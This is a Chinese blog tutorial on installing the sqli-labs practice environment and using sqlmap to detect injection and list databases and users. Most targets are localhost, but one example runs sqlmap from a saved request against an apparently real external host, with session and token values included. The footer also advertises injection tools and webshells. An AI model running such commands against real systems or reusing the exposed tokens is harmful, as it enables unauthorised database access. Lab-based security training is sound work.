SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)

已于 2022-10-08 10:38:13 修改
阅读量4.9k 收藏 9
点赞数
分类专栏: 测试 文章标签: sql 网络安全
于 2022-04-29 11:51:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42166929/article/details/124492725
版权

SQL注入:

sqli-labs:

一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境

phpstudy:

https://www.xp.cn/

安装后发现数据库和我本机的数据库出现冲突了,只能使用

sc delete mysql

删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入

mysqld --install

删除之后成功启动

image-20220428170614456

启动成功后,去下载sqli-labs:

 https://github.com/Audi-1/sqli-labs

下载后的包导入到php的根目录WWW下,然后将D:\softwares\phpstudy_pro\WWW\sqli\sql-connections目录下的db-creds.inc文件里面的用户名和密码都设置为root

image-20220428171148955

启动成功后访问

http://127.0.0.1/sqli/

然后点击reset Database for labs重置数据库

image-20220428171242818

如果重置数据库出现mysql_connect(): The mysql extension is deprecated and will be removed in the future

进入phpstudy,选择php5.5.9版本即可

image-20220428171439116

sqlmap:

安装sqlmap:不要后面的算法

由于手动注入、半自动化注入效率较低,对于一些常规的、重复性的可以交由神奇sqlmap来完成

sqlmap需要python2的环境,因此,在安装一个python2环境,因为我本机已经有python3环境了,所以安装python2需要注意一点:

先下载Python2:www.python.org

下载后安装就OK了,然后配置环境变量:把安装目录加上去

image-20220428171922576

然后重命名python.exe改为python2.exe

image-20220428172007823

打开cmd输入:Python2

image-20220428172101709

表示成功

sqlmap注入sqli-lab测试:

在sqlmap目录输入:

python2 .\sqlmap.py,

出现如下信息表示启动成功,可以使用

image-20220428172246369

打开sqli-lab 第一章:http://127.0.0.1/sqli/Less-1/

image-20220428172338631

需要传id可以查到数据库的内容;

image-20220428172415936

输入地址http://127.0.0.1/sqli/Less-1/?id=4

image-20220428172457790

可以发现对应数据库数据一致,接下来我们对数据库进行SQL注入测试:

sqlmap命令行输入

python2 sqlmap.py -u "http://127.0.0.1:8080/thymeleaf/listCategory?start=2"

image-20220428172958498

出现:已经检测到是mysql数据库,是否跳过检测其他类型数据库,输入y

image-20220428173119343

出现:GET 参数 ‘id’ 易受攻击,我们选择Y,sqlmap就已经判断该链接的数据库以及其他服务版本是具有SQL注入威胁存在的

常用的命令:

image-20220428193622546

例如:输入

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --dbs直接列出了我的所有数据库

image-20220428193839191

例如输入

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --current-user直接列出了当前的用户

image-20220428194411911

也可以通过文件进行注入

文件为payload.txt内容为接口信息

POST /biz/modularity/project114/manyParamsSqlszsfdsfwe HTTP/1.1
Host: http://daily.manateeai.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://daily.manateeai.com
Content-Type: application/json
Origin: http://daily.manateeai.com
Connection: keep-alive
session:dd9cee1fdec64bfba5843c6f1093ae3a
token:a6884edadb24c247c3c632b521f91f77

{
  "name": "张三",
  "pageNum": 2,
  "pageSize": 2
}

输入命令

python2 sqlmap.py -r payload.txt --batch --dbs 直接列出了当前的数据库信息列表

风险等级评测:

探测等级(执行测试的等级(1-5,默认为1) )
参数: --level
共有五个等级,默认为1 ,lv2:cookie; lv3:user-agent,refere; lv5:host 我常使用–level 3

风险等级(执行测试的风险(0-3,默认为1) )
参数: -risk
共有四个风险等级,risk 2:基于事件的测试;risk 3:or语句的测试;risk 4:update的测试
升高风险等级会增加数据被篡改的风险。 常用就是默认1

例如:输入:

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=2" --level=5 --risk=3

image-20220429113021283

注意点!!!:

每次注入完需要把C盘有个目录下的缓存文件夹删掉,如果不请掉的话,会拿以前的注入点去注最新的接口,有可能会造成sql注入结果无效

image-20221008103039124

魔仙大佬
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入--sqlmap自动化注入工具
pygain的博客
10-09 1万+
相对于手工注入自动化工具更加快捷不用反复写入SQL语句,但是不如手工注入的灵活性好,二者各有千秋,在适合的时候使用适合的方法才能拥有最高的工作效率 简单的使用过程如下 后边我会把最新版的sqlmap下载地址放出 (XAMPP搭建的并非MYSQL数据库,所以能够在不添加SQL函数的情况下拿shell,在mssql和oracle中并没有这样的问题可直接拿shell)
SQL自动化注入工具——sqlmap
xy_的博客
01-18 2267
自动化工具除了sqlmap外,还有Havij、Pangolin,这里我们主要讲解sqlmap使用。 1. sqlmap 简介 sqlmap是一个开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。 它具有强大的检测引擎,针对最终渗透测试仪的众多细分功能以及从数据库指纹识别,从数据库获取数据到访问基础文件系统以及通过外出在操作系统上执行命令的广泛开关。 2. 特征与功能 特征:全面支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Micr
对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)
weixin_34033624的博客
08-17 2214
个人简介:萌新一枚,渣渣一个,全程划水,会喊六六 本文断断续续已经写了三天了,其中查过很多其他人的博文 但是发现大多数人关于sql-labs使用的都是手工注入, 由于自己太渣,只能去找工具注入(QAQ) 希望各位大佬不要见怪呀!! 不论喜欢与否都可以留言哦!!!! 关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式 关于...
sql-labs 全关通关教程
最新发布
weixin_57682301的博客
07-22 315
根据给出的列名找出各列的名字以及密码(username和password中间使用~分隔开 以便分清)判断是否有sql注入,在后面跟一个',页面报sql语法错误证明有sql注入。将id=1改为-1并使用联合查询找出回显位置,这里显示2和3为回显位置。首先先搭建sql-labs靶场(不会的百度搜一下有教程)在2的回显位置上输入database()找出当前数据库名。当前先更新这么多,后面的内容下次更新,溜了~id=1查看页面是否有变化。输入--+页面回复正常证明闭合成功。在输入4时页面报错,证明有三列。
10个SQL注入工具
paoling2010的专栏
09-14 2278
众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。 BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。 BSQL Ha
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6897
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
Python黑客攻防(七)运用sqlmapsqli-labs进行SQL注入
qq_43681532的博客
07-16 2540
前言: 本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入。后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤。 sqlmap基础命令: sqlmap支持多种选项,-u 选项表示后面出现的是URL, --level 选项表示要执行的测试级别,–risk选项用于设置待执行测试的风险。风险表示攻击所用SQL代码的危险程度,风险等级越高,表示相关网站出现问题的可能性越高。 -level选项 0:仅输出Python反向追踪( Trac
自动化SQL注入工具-sqlmap
u013008898的博客
01-05 1533
1.通过burpsuite.获取拦截到的请求,指定文件进行探测 python sqlmap.py -r target.txt --current-db 2.通过url地址进行探测 Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。 探测参数 1.列出所有的...
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1058
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1182
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 701
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
SQL注入工具
03-17
SQL注入工具包,明小子,各类大马 小马 。啊d注入工具,浅蓝等
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
SQL注入天书 sqli-labs
01-11
10. **自动工具使用**:如Burp Suite、sqlmap自动化工具使用,可以提高测试效率。 通过对sqli-labs的实战演练,你将具备发现、利用和防御SQL注入的能力。同时,这也将帮助你在实际工作中更好地保障Web应用...
Sqli-labs靶场第17关详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 826
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库。
sqli-labs靶场使用sqlmap自动化注入
星虐
03-15 1273
1.检测存在注入 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ 2.爆出所有数据库名称 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ --dbs 3.爆出security库中的所有表 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ -D security --tables 4.爆出users表中的
sqlmap命令_Python黑客攻防(八)运用sqlmapsqli-labs进行SQL注入
weixin_39680208的博客
11-21 1136
前言:本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入sqli-labs靶场搭建->Python黑客攻防(六)sqli-labs环境搭建 ,后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤,在进行SQL注入前,我们先对sqlmap基础命令进行简单了解。sqlmap基础命令:sqlmap支持多种选项,-u 选项...
sqlmap使用(以sqli-lab为例)
wusimin432503的博客
04-09 821
5.dump出数据:sqlmap -u -D security -T users -C id,password,username --dump。4.爆出指定表的列名: sqlmap -u 网址 -D 'security' -T 'users' --columns。5.dump出数据: sqlmap -r 文件位置 -D xxx -T xxx -C xxx --dump。4.爆出列名:sqlmap -r 文件位置 -D xxx -T xxx -columns。sqlmap -r 文件位置。
Sqlmap(SQL注入自动化工具)
F2444790591的博客
07-16 3791
自动化SQL注入工具Sqlmap
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值